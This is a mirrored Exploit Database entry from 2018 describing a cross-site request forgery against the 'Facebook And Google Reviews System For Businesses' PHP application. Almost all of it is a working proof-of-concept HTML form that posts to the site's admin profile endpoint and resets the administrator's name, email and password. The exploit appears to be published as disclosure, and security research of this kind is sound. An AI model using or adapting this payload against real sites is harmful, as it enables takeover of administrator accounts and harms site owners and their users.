Facebook And Google Reviews System For Businesses – Cross-Site Request Forgery (Change Admin Password)

• Exploit Database
• 97 阅读

• 作者： Veyselxan
  日期： 2018-12-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45992/

• # Exploit Title:Facebook And Google Reviews System For Businesses -Cross-Site Request Forgery
  # Date: 2018-12-13
  # Exploit Author: Veyselxan
  # Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559?s_rank=38
  # Version: v1 (REQUIRED)
  # Tested on: Linux
  
  # 1 Poof Of Concept (Change password):
  <html>
   <body>
  <form action="http://Target/action.php?action=profile" method="post" class="form-horizontal form-bordered">
   <input class="form-control" name="name" value="Admin" type="text">
   <input class="form-control" name="email" value="admin@ranksol.com" type="text">
   <input class="form-control" name="password" value="password" type="text">
   <input class="form-control" name="phone" value="+18323041166" type="text">
   <input type="hidden" name="id" value="1">
   <button type="submit" name="submit" value="submit" class="btn btn-fill btn-success "><span class="ace-icon fa fa-save bigger-120"></span>Save</button>
  </form>
   </body>
  </html>
  

  Python

  Copy